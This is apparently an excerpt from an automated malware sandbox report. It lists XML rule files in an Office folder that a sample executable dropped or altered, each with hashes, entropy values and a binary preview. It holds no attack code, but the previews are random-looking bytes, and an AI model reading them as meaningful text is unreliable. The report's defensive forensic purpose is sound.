                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1736
                                                                                                                                      Entropy (8bit):7.895949267573746
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:08S2pB3nr0Z9EdXhWKm+kKkPN4gyekIHSjomQuE2IZLrD:/TNnrhdRWqkSg4Xon26LH
                                                                                                                                      MD5:B2BD4C5830A8987262A33FB3F7280D9B
                                                                                                                                      SHA1:E1BB7C0532CFB40B35D3D16EDB1CA07287242A0B
                                                                                                                                      SHA-256:E85E47EA82BEACB2148CBB177DD85FC71207F07E4F521E978D7544D661CD45B8
                                                                                                                                      SHA-512:50D2C79A554F4B6221D1AC2D62C15706C296664B88FDA20D37B8D9B53A63A3E452A13E1FD3AAB322D5EA54F352A370E9562C689E4E1B99FE3381D8AF3CD6C2AF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.........).$._.u%u.....j.Ns...>....d. .+.q.....rj....zjS(...3Jy...N.P5I......b..D.$e..........3.u.M.q.p..:y..\.....=]X..+../Z..=..=)....y.Ma.'v.%zs.g.JQ.\m..A.{..w,....."..'O.e.l......<Fs.h.....}..."p.`.;.~......#Y..1.. l.<.#.>.Y.....aCY... ...<.I@&.Y.DhF..$T.U-..I.52.I. .i.=..5..^.."...5yN.ss.%..:.t.v.Z.4...(..O_.Mc< ......|u.....h.#.R.M/.2.x.uPI^...f.U*.x..rC1.H.;......'.....h"..%..$..M.....;.1..]cX9e7ts{..+.s.........LU.......TK....)...h..4....;ir........,?v....`..`.....R.R\...Q.......#X.*]m..s..$.-.:..S.....fe............:...MJ.$.sR.[S.S..'.......{g.}...;.....qB8.u..Bu.R.X.b+..Q....g.*..#:r...7r...$..@..~....b.H...].......l...*X.v.....%..z8a%).]E.-..b.ec.DX8......[E......~..........7]..VX..n=...=.O..'.0Au......$.4.T...o'|.-dDx}.9..^...K..yj.`.......Q....@.i>...f7U..1...D.(..w(.gm'..P..r~E......8..h.&.x......qW....:.|...?.._.......R.8(.~.d.d:..>.7.d....7....+...S.....Y.......)L..s......Y..C..Q.....;..L]D......x....aD..(....#.q.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704000v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1715
                                                                                                                                      Entropy (8bit):7.882225833664797
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:UxULmiEnnqB8zAjgoxsvfuOnrQeDFZyiaeWZ3tTfslGBD:UcV7B8IgoKWZGFxaRZ35
                                                                                                                                      MD5:8E32F7E6AA39549EFBD81F253864D872
                                                                                                                                      SHA1:2390A26746C5FA27A1F607626074EBFF14BF26BB
                                                                                                                                      SHA-256:C8F7B3F50C8DD7B0A91437C9AC5E1D346F20CE3582C1F788845322574301864A
                                                                                                                                      SHA-512:F951030D637B9D7C3F99ECC8F9FB9D490F48F2BD86B38079EA75E054E0BE8D212EA4B8D28109317066B63024CAB68BA676E45916307052BA22692851A6C2F5E7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..j...RE.. .....\u.T.<....B5....)9.]e9o...E p.A,W..].......8...E@.\\...f.;I.w).0h.x.:...g.H..^K.Y...Y.ut}..2.DFs.S..D!..C...7....U....an.Gb'i....(..m..]..X..N~.q..'.gd..!......]..<..ipk(.n......e..wt.>.e..7.Y.@J..w:.Z.l.._..gGf.d.l.n.D.N"d.._..^..e...?.#..]H...o..].5...x..4_.. .R.E...K.r...#fK....d.PW.Lz]E...I?..`... .~..]}.n...zdGp.u4'.z...o<.7B..yE.).-m.....y..:5YS$..,'...I...I..;..?T!...uX."..].....1..b.^.p`rd7...|.x...=#..,...%....*.4...O.\....#J...7...P.@.2...k..`..p...v..2-.u?.....V.....|.......xsf..$....y64...S..t@.x#b.E..5.,.. q%......+]..R.yX....4...pL.D.g.$.jwtQ`..1.......d.#...,s..(.......!@....>.,.j..."...%..q.j........BQS..}1.841.....?..:n.U)..,......r@o.T...ui.j.5..".S...X.x.....$k..#O7f.Y.Y....^.|...1....N%9...{....Y.Oj...T..4.@mx^...f$.......>.......b.e.....'.O.G.7O@r...u.`.d.....]4.(..s.W.m...;4.T....~..M...h.....4..z.....NeI.......+.=.t........b.`..4?..?...@...<..I..t.Pp...s D.G...\n.3.U....!....=..t...i..F..i.%y

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704001v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1752
                                                                                                                                      Entropy (8bit):7.888176424307885
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:MMjD+m4Q7QvI8eVWPHtta6aPFKKD5zO+D:MSDC8QvsUt2NKNG
                                                                                                                                      MD5:0FAF6DA7301242E2ACD6A401955C2C6D
                                                                                                                                      SHA1:C114E242955FC9436C4E716C181E2EE0FFE634D7
                                                                                                                                      SHA-256:4E3898839EEE71193BB1D5D5C072027D7C914234457FE9145E209C5433987965
                                                                                                                                      SHA-512:337C685DBAFBA70AADF51E24C2BE60E94C61CF3E598A1530FB9607B138D09DEB45FF005666415F2BE8E9AA8C3DC2E210BA27BC2C6B89E0E71B8A786EAE07F273
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...X.....1.-=.j4i]x..M....'..."..:.%_....k...?da..{iB2>.$..>..|..6..@\...,._.p...H..AEE...qm....<V.j..R%;5.NA...M..s.P...Gf..]....D.`.m..+.....=.'.x..{............_D4'...\.hz..n.......7...R..NQ4y....54..3O.b..E..A..&hs...A......m..t).y.T......G..<..]..0%c.........HE.W.C.:,l.F...z..i... ...."JbNY...k=..h...z...a.<7...u..I0......`~.R.t.Y.....D..{*..*i.E...:.~.Hj.......L..M.\......*S.....ok@n.g.Q3.Q...<..,nW...?..B..{:OP.r...o.e..<}.H#t....!=..7+...r...Hv..*P.....1.v.....|...-.s.$....M.."7ZH::....M.}...#8...og7...>..*.G..#.AV...........qZ...._...b.-[..:n....I{...Q..\..=...Pcv..........U..]/)X........"nm.E.4....K..,....=.l.I.PI..C!..P.MP..h...S.v..J...Cp.....l.m.....(..'.*G.C...E.J...X....F..H.r.8..U~..........n.L....i.....+.M..R.......3..K.....d...&1.u.....7...NG....Zq.a.7.......`..o_..>.Z...'= ):/...i...C.0.d>...4...Rd......#....=]M...#.UU.....A..x.YW...j...\.|......(...Lj....f>..4...hj.o.X.Z{.........P..-..N.<...1]..%...d..}e......

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704050v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1689
                                                                                                                                      Entropy (8bit):7.891408187811495
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:9UW6IsIwbKdm8Ri46Y9OdEV4PlXnFIVxRT7tKD:7Zdml4L2ZPl32V7T7tC
                                                                                                                                      MD5:B789C2EAC19C9F8693BB37513E43F225
                                                                                                                                      SHA1:E22229A210D3D3A3E7BEE855D43A5C769E7617BB
                                                                                                                                      SHA-256:ECE770E655989C6AAEB23E249D2187BF425166220620C40EC8B55B1ADA74F5B0
                                                                                                                                      SHA-512:DEE982381B4DDADAB52645F01746FAA89A3BA46370185A1ED795B248A4063A0FE6152A20BEDEED7DF436B9B0870FDE903914D1B0DF1E3E51664766A1D0FB9126
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...........`.\.b...7.}.k......S.T...)..c......(....2.d.....q.......V..Wm...o...E../.......m.N..'...8..eq.b|..M.e...(..r?..R....b.....|.n....u.].).=-mK....-...d.j|.U...^.7.....v..Z......./vq.I...?YTG.. wt.@...4.......2..s...ya6...f.auS...N&..i..............D.&..`:.......Dad8*..~.....&s>5..7..%...*..^....(..v.Q.kl.....2...*..].5....w...l."...........J.;B{).....Q......!..n*.._.-...d...u....[.k..&.0.w'.p.X..4J.III..5.......f@.a.cT..K....d..#.............]...JZ.H...........>..h...n..-....NM..u...R...k....s[.....<$.n.?...1.8.o0.h......b.7f.h..[w.?......".1.).z..q.}.i.iK..%...#ap......}7...uu.ca.=.I.E.1.K..ZtfX.N...1?t1 ...=+P....D....7}.'...`C8{.E...N.z.#Oy.SE..8.Z.#.......9.....n.2`...M>.J.3...0Y..fAy..}no0.,..3.....\.'GZ.1}.=...N...0...6....p.."jY.q....Hh.g`..k.0'..Sw.`....a.b..8..[E9..~s.WP?.<H.......F...`....c...D..Lq{G.n:C._.P.+rm.J..[.d.*... .#..E.v,kGx.J}i.........a.-..y.<c.E._F.X....v.FB..f.H>..U...@..b..nb..w.C....]..]'..R,.)..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704051v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1726
                                                                                                                                      Entropy (8bit):7.881561429909432
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:gCPD0Z5izCtyvLqWUGOtAW4HQ2pxeL4WPBYsRD:h4Z5i8yvGWU8ZpsZ
                                                                                                                                      MD5:546600B949AC98EB9ECFF25F0C053102
                                                                                                                                      SHA1:ED1B455C3569B35202ABCB3B3FFFED231122CCE2
                                                                                                                                      SHA-256:F0170A0FA8CBF349C492E8AAD027076F05AFF2FA020232C33C648C5EF9327C42
                                                                                                                                      SHA-512:63BCFD0D114DD2654931353056FEEFCDED96E045F5C2767CD6D6CA97C63F7DC624DFDEFAE3AE1056596A34C8DCDC475153F829059F3456E87AA98AE0AF3C635F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml]...|..H.$J..(.M..:n.az..L........g.H.Xg. ...>......*1.....@.yl.\...q...[-.U.0....V.S.=.`.f..2.....r..[31..|Ka.(^......*.*5.2.3.]..2...*.SB..........V.H...8a!tP.c.Ro..........6.h`..^..{n'.X%K..Q.;3x.....b*.Zp.F..wJ?6.._.+.....T...:........M.@Q.#..q...C."D.$....i8^*.n..6K./.#...rR......F..T...ri^.y..e.I.-....MJo:M...qY.f.j.C...U..|.....y,..U.f..;...m..L.d...\E.....e...mw.qv.......\..yk........W[K..MO....8.#6..w.YX._..j$..)..yn...=....4..^)3.?..kS.?...^Q...;Y..'a...w..,.L`."..lr.~!......:....W..B..HM{.K..{.....-.hL....`.........V......W...l.^..B...*........|.l..@....z.k._....csD..M.K.*>..%..BQ..r..3....B..7.<....}.._r.-.....[......*...~..=m.G...$]k.".wu+e..N.......=...f.m...*<.7....t.Q...(..O...O.F......=.....D.J...i`Q]wm^!....4w....B.;h.....+M...?}../.Y&u.t[....7.4!F.U.O..g[=..;....O.....{.e0....Z....p...w..O|*....../=....3.A.c.&P..t.I}.wh..y.,F.z.[<.._..NL@.x....l".2i].?.w.y../z...!....s...U..}<.........`..~;..3.n.....H...@.....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704100v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1695
                                                                                                                                      Entropy (8bit):7.870362832103233
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:dcZR4CPkqQ8XCd/gHOKCE26++EXA1yB9Uj//JgxZD:dSeCPkSSdeaDXAADUT6
                                                                                                                                      MD5:3B123F000395FFBFCAE37B01F43FC3C8
                                                                                                                                      SHA1:771563C04B6C873EEA5A3E8EA30D122FCC486AED
                                                                                                                                      SHA-256:6DFEE71DDDFC3EAA25007BAA5FA7B73411DDC4CEE9E51C42A8FFAD7FB23A6EC0
                                                                                                                                      SHA-512:B4EF68EC3F58432F663342D95D77AA9E7E9B06610C1BF4B0CA3E1B5FE0ECFF5387E8F96D759045D28A1EDB8F78148F532A349B2D9FF6BC1CD23A93E284E9A107
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlE.w......j..7.]gbRIw..Q..2.Z}...oi...A.k./...k...[.]x!#&.si`G.{S.9Y;R.>.s?P...I2hvO.fS9..P....5k.H.{h$.<6k.v.*)4..`A}.z3X(......6.sw7.q9.2.z..D.!d.A...%.I..Bm}.]Kj.D..z..8......[..n..~...z|...yV........Rc]r..J...;...J..?..jx%..O)..V.R(`w.. Z.. ..Q...n....?.DN......$.O\..Am..E4{M.....ID..*&d...9@-N..T..M.....$.|..7&#.j.HpO.P.acx4....E2..F6.......sN....'..3EU$k.b....7a.fVO..q...l'.m4.Z....6. .vF.Uu.=...0=..Xa.d;....F|=.....g0~\m3:i.....;.`...Q.tk0........'qq`......`V..8..S.B.jy...+.{6W,k..Ya..............)..^...T...j...Zy..4.,8s....&....W..]J..\.Y0{"5.n.....Qs,..h..8qs.1..P...!..J....A....Q...gq.qK....9.m..,9.T.j.8.6.r:/.._....W.. ..JJ".a....O.C.tU.u/...&ZX15.V,.`k..:9.(..'.t.4l.;...t.&..l...s,........4A.H.-...G..-S...t.2[. .......z...g....5.,.<.A.1.}...A........)s...n....`>..^H.$..y..Xqd...>..y.i.].d..T:...Mz..v.x../).1.Upuxh..P.......(,..z'=.2.....|V5'....C;.."_`.dF...z..P..w.;I..G....+.}....V..=.?.pL1..F..s..#$\<..Ns;P......7.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704101v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1732
                                                                                                                                      Entropy (8bit):7.853348457554825
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:QK/6rAMn6q6frdrwVJoaGS4WLrzIXFtaD:R46qgdrwVJZbwXq
                                                                                                                                      MD5:10014F32EA5AA973AF9F205DB1D6F96F
                                                                                                                                      SHA1:B12D0707990DC071A91C72A6B3AB49D45581DE07
                                                                                                                                      SHA-256:FF20DD1D28E8C80A99D4AFBEC445B58091FF9BF4FE8104CC4BC546B1E06471B9
                                                                                                                                      SHA-512:D608249C1C0CB5230DCFCDDCCEC95AA7F2958E48F2A8F34033EB7870DB239B7DB436409DCE05C1240D6E14D562D46834FCB68BFD5B11FC731F00F9A734641976
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..2..'..AU4...V...5J...>....l..j.."....I=.n.....n..%w..v.eC`6.yKN4...me_V....{.I.O ...qh.%.J.}..M.a...zk...cm...1...,7..Q....6..[Fs..Q\.m..\s.._.....+......\$gd..t.g......a,...=/.y.|..7..s.e.;..=....r]..W^.tZ~m.z..8.s*.....zR1.A..cXB.h..=.....|....0l....z...;.....5.:a.._NB.L.+N|O..b.(\G[>...&Q..r...>../...)......H.>.8eV.et.V\..h.4.*ZW....k.c.h.&.'q.J...D.R..2x..).2H..<.........&...\....~....Cw`2..W+.nr.....I}.._I_l..k.'E......0..."(....Dg.re}P..R.d3sC..,...._..s....t...G..h6.........a`.~.G.T..>...$0.14Q..rDu....<t..0w.....F...$.G.T.N9wK\.....?8...7.\.c..1R..*.=U.0.K'.D. 1.z...p.!m{.....o.....wc.WY@..R..s.6...j^,..}z..(..0@G .O...G.zH..VU.A90.~......d*Ew1...k..\..*.../t1$..b..Q."..[u@...7....`g=.N@....8..k..f.~9....L......e...6v.,a.C!&3uU.P..."VHDI..-...*DE \....-.......7]..x..#........}..lu..J.H.vx..m^.c`.AK.r.U..|@.U.kj.T..e..(O.......lc.1.~..v....s.B.c..0Z.6..'.R.$.......lF......(.-D..qS..7...%..KAj..\_.q../.l.....N.......*.*../.?

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704150v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1695
                                                                                                                                      Entropy (8bit):7.881390536600415
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:KrBNO4QziJBmv6+aaG5KIhvjzBedTTBV5cKgYOQnuS3Q01KS3AHavkeR/rpbD:SNO4VBB+i5vFwV75c8OWuSB1KSS4rJD
                                                                                                                                      MD5:06058B5ACEF1FEFA04C89991BCBEF727
                                                                                                                                      SHA1:B627561C7DE831075368A52D70242BC5A71D3F57
                                                                                                                                      SHA-256:8A2110DE158E140476B276ADCE2032C5909161D3970823963C1A71BADA63150E
                                                                                                                                      SHA-512:63BAF1E7D5C45887F4EE5243A0E07D93390E58E08832302975D930B511DB9A4BA9593CA81E5F0EC1BD8742126542A2A6579B2D25EF8B3644237136A00D75C4E2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.Q..\..b.i.L..d......M.x.;...W....&..-'.t....Fs".).t.n]..h.".&P..C.!I........s..j.)s..$.......4..P.`S..Zz<.`...e.rO......R.... ..h[{...Q_....w..Z.I8........e.i.|...6.......@f.|X.X.W....0.A.*........f....O.M..`B..{....w.Q.e`,.....*...I..x1.8..d*..rl......._.K..p.....t.c2p..o....VS"l.....l.[...f*.&....~.*...((._.('...u...9..w.(I.......N/.....V._.....L..c..).J...@~T......!......$.q..#pew..."..N(.p.m..Ac!....6k..b..%4....2..^.d.Y)...&.....h. ..E..;F!pX._XM.c;.8.s.P.X!.l*f..{..R>.........|.4......D......]]0z.q;.Aw..>!.e(..y..TS.^%....O."_...........0.1W..Gr..)(3Qw.[\....a.`.SP.`...W.C...#G-..8..".2`.NP.9...O..l......v.......h...qu..n..{.;E0+q.J..K8h..h..N....f?.A&..w&.....Q}h.*3|..Mn.F..-4.d....;.........+......H+......."..%.D......_..v$N..t...a.L............0..u._..F.0Iy.n....X.......B...K...3..O..x....^.......8....N.G.(...:.....u.#..aRq.O...y.j.P'5.J...y.....U_7Y.t..5...c*{u..m.4B..Um...*....C.SA...K%,..v:....u.}.;w.......

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704151v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1732
                                                                                                                                      Entropy (8bit):7.860499799016861
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:2VUPt09zJH5hEHHGpkZTC0Mjo4ax+kZMpBYIq39aDxD:2VU10/BpkV5MNHeIq39e
                                                                                                                                      MD5:AFA6D1C67DD970ABB0FED31050FC940E
                                                                                                                                      SHA1:27E620D1EBD788B23A32D62607677E93E8272391
                                                                                                                                      SHA-256:9F105C269B15A96BEC942FC12A4DD8D5E39FA7014A71413E5067486F3C0F9832
                                                                                                                                      SHA-512:0E2D3116FAB2B48CE95EB03FFF80C23020C99ADDB66A7DDD8076CC123BC2BD88EC8090F6CC6D7AA35F3DF75F30C22814529697C540421305E7BB761F5264D97E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.j.26........-< .......d...N.....y....J....z\....Ag.?!6tmv.Z..+...D.Yd[..P.Ek.?.]y.fp=......R.._..3.....*.6...0.9.V7...S.1../Q.%.n.....Bg.C.3g....)}.L.k...w..GHS.*..>!.%.....<...WW.....D....R...mf.}ZhU:..h..z=m.;.....u..p.n2.....-C....)M.c..RTHEP.......]w.`.(.q#?....V{../8....C......sML/...4.....S.....t(..P..\..1..B |..L{.(.e..?^....0..}*...m......').<`,.in......<#..g`.B.@.)Uy]...I....Wi.K>....6."....A...H7...A.Z.....5.....c/.80.c.;I...E......*$\.?.8..U....Sm..L+...s7.,.#..y.|.8ys_L...km.k@\...?.!.....F.1p....j.e..DA..VK.)....E#..B..7yff...v.B._.d.._..,6|3..=...-Y....dn.$g.=.{u'QI..,.q.O...)w;>.....^h.-r.E...1^mj.. .....h....mQ.........G0..aR5t..u...........2O,...0.".^.>..S[..C1.#.9v...E..Y.A.....D.v..h.F....zqL._../..............e..6..W..X..ELc...t.{.1....u..c5............u.K.z.G..q.....+...`.m..*s..x...6..?f..=~3.u3@..=.#..83.2#......x..M.... ..CV...h..D#,.....!..q../..y*M*...EU...4E......A.&.........B...F..*h\.H...>..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704200v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1713
                                                                                                                                      Entropy (8bit):7.891388319431913
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:wcCr280KLTMpETyY/+6OW63i0GGUBmwOD:ix3PMpH3i0Fcm7
                                                                                                                                      MD5:2B8EEE63B254659BE9E2C8CDD2CD62CB
                                                                                                                                      SHA1:7A8E3796D74F50A0A62A4CCC82F9BD0DD6D8E3D9
                                                                                                                                      SHA-256:59ED1B34A27C631D1BA04A3014B1EC44C033C31E155694AB7B2B285DA5D9CAE0
                                                                                                                                      SHA-512:9A28EDB61ACF71444D53998A74D1972E3B24C5CB2FEF5615F05EF3030259EB22D977AD9CA6CE53E7BDD93E65CBCC660DA1DA98BD435DB1BEA4114A5D03EB08BE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml+'.....2...Q...Z....[.E..9/...7..OTX.....,S.....r.5?..tq.........S^..... ..t.,..p..q...zr.6.{..:.'1......(.>;......."`.o.^S..7#0.z.e....$c.". Z...tLK.o..:l\.(@..V.u..e...ry\YE.O.Z..q<..(>!{..$.9o.;./....P;.1|.j.....+.[F.$.$Uj.6....I....,..[2..]X.Z..@V.L.M....^h..8'.w......^.,....;I..b.....u4..KI.H....|...g...X.1.&...|z?F|7.2p..AQ..........S..Xyp......q}."...c....[.RrK.7. ..V.p2..B&......)6.>"5.<.3.......?....}0 ^+..S..G.J# j4...X..)......`....h}D..{..|xY$y.%~I........F...$@..XS.......`.(...v.j..T...*.,(........"X../T.n.%..=../...h.._.}Y../..&..H.I..+.Cc.O...^...Qn.s.F..B..hJ..BW...{H...BF..k.A.....rq`....g/q.x*..........{...U..{>.<s=g.0.w.:...t..p;.m....T.$:...1...d....w.*.<..t..Y.Q..y61...P......'...s... ...Bi....q.C..x.l=^..OX...i.;...R..H.mpoR......c.91G...%?......j...7...3Fb/..[Gx...#V.KAt.Q6.8......J..qw=Z.E.z...XCZ.&............n.C...q....v...x..x.H.z.%z.x.|......x).y....S..0-X@....a..1`y.+..4...."^..(.v..^.....s.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704201v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1750
                                                                                                                                      Entropy (8bit):7.891029613172827
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Lc+YlIPBa6LGteRlB1s3kuA3S1cMedIm9ehdy5nQ/kVJVRfXyN5/TNxUiCnFIjbD:Lc+YCa66tYOr6Z95nQMVJ7fXy7vdD
                                                                                                                                      MD5:5B7A9D17E8F9E51B80397124ED78D7A7
                                                                                                                                      SHA1:84A28DA312C49CD2FBFC3DFC78364F20A0EFD257
                                                                                                                                      SHA-256:BA35E1204CDC28200CEDA30D3016A5D450DCEAC38A8B8016FFC6730CA3A55C9A
                                                                                                                                      SHA-512:93BBF61118444C1917A4A9DA6C8B4E18B398ABC59571C982528635AAEFBCDCB68EDD560FD61F7F750271636025BD0AB91A12FDE8F312A33C50B5E6C89B1C95E8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..0m.<6V......}.O..u[..H.M>...g.m.X.;.H..wc.......".R...L.#.}..&A.Fg...,...!...C........2^eJ,{..t."&.Q_...D..r.....@H.2$_(.D...]r4q...j.....i....... lg4.....l>.$._f...*d..|..F. ....J..`..:.-,.P......@......A..(..-.8.....(A.|...ST..e.o..y.Uh7.L..*c#....t..f.XM..w.q.m.8#...*x...y.A....R.....[_=.m.. ..P.....l..#D...H.!W...W....qj..&v.....}.-.f.C...0..UQz.#i..HQ,Lf.l.Tl..e.>.].^x.j.......!6LJG`*8d...fl.!X.../..d].Z.t....[.....}.S.......D.z...tt.....h..wc...eh...T.=.o...My.<...=px...4.i..c.....^7.:..:.a....jh78U.....I.}=..O..'&.\.4.]_....kL..E..i.s..h^.:..NJX.H..'.....1BF....]..B....*}G.f...B...;...`0...Z..m....+....Z..O..l.g$._+.E+.|..Q.T0.....`~.....\B.<0l.....Q6...............7.).uH"..0.$B..mF..bm[..'sm(h.+n..u..K...k......A.w....XDP...r0.I.$U.%..J0.....)._.....f;.eA..E........%..<...j.8.ZX.^...j...........% .K.{.r..`.].A... ..p6....cs*|....u..Z".._.....1,...l.ip.A.\....2.e.g.E.....3.....AXH...v.g..!p..........BZ...."01 ..I.......

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule90401v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1583
                                                                                                                                      Entropy (8bit):7.884807677624568
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:C8B2CoKFTQnSAHvSJphKgIE2IS3xiiQ36weqARdAHFTR69Ex5t6KM2WMbD:C8MamNHv+/KgU3MiQqXPHm50GD
                                                                                                                                      MD5:B23BCD945C2D3E398080F051C2F02FBC
                                                                                                                                      SHA1:CEDD14D5F9B0ABC84493F96CA026B34962B57493
                                                                                                                                      SHA-256:14EFE654B1EB249D2D71C46373596726610BC6839B896A9A0E83BFC63E2F365B
                                                                                                                                      SHA-512:058F2B34A6BD5EFCD07D118A6612E9B69AD686693F23CAD73561F4DFB7ABC53FE8CA5183292D8DE38EDF1CEAE04DF6DBB4C9F1D24CDD05F81B7EE8D877A66BD8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...CP..+N....tF....~)....K....u....n9.:..z.|.......+z...'...-.?q.<zw..-...n....?,.....a....:W...o....R./..eul..5...6.A......d...@..\&......1.z..^.Y..s./.x'...2..q.}...etp9{......J.z.KW....Y.....9.:.'..rv.v..u.1.O.k.M9..@....9y.h).......C.3.DC......W....i.i..{y|P`w....p.....M.:....[..r.r1......'.....J.K.3..}....H.G..4(=)..H....Z...........$.{.".A.R.!./u...D.5.I.|.0.%..Y..;.8x?g>.I>.UT..T.e.Tx. Y),.x...\V.%]?/....!.{.Z.,?..kZ.^V..r...8^.b.dW.s....,50.z.}...-.%[.5..g.c.=.Bk..*p.h&<....m..e?.<k._q.@9i..`v..5Kz=.Z.f.51.I..1..Z......!l.=XO.YA..e..v.%j."xc...a^@.....V....0+...U....7.G.&.`[J.....#zOM../.Tj..Y9u.......x.Cp...b.......-.f.4..4-..Jou.o...e.}.....u....../...?=.....o.%qw..v..1@.4b8.Z]!..=.....p.F...].).v.....3..~.=._.X.......5....]H....9.UZ. .k.k....?..=..c.....m....i..b.Hb`...]JL...R#E...].."..C*...$........6...&...73G.9....{.\..E.......Z........0}..R.Z\.V.e=%.)+._5.....8....3...Cl.L.....OC...=Q...So.m1.!.f..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule1000v5.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1928
                                                                                                                                      Entropy (8bit):7.9046469398158985
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:GlmW+0Ls/x3oq6y01qACSmwgEk+dwJLARWnWl/qD:GgW+es/Zoq6y01qciaWiFa
                                                                                                                                      MD5:DD4410F5759CD8FE830B133B616E7E27
                                                                                                                                      SHA1:EB44E9DB5EA766FD65E51B913619B65DFAED1F49
                                                                                                                                      SHA-256:73675CF6359CC46F4F5E1CE27DB80DD752E878FD826E56E324405DB06F5272DC
                                                                                                                                      SHA-512:45724B021735ED20883BB6F8F3FEC8C6FBA4A6401711D254DC9A3094C63A0A5F6E27954A818C7957D69D322A04E395562E7E17A499D315D2BB494F77B8738A23
                                                                                                                                      Malicious:false
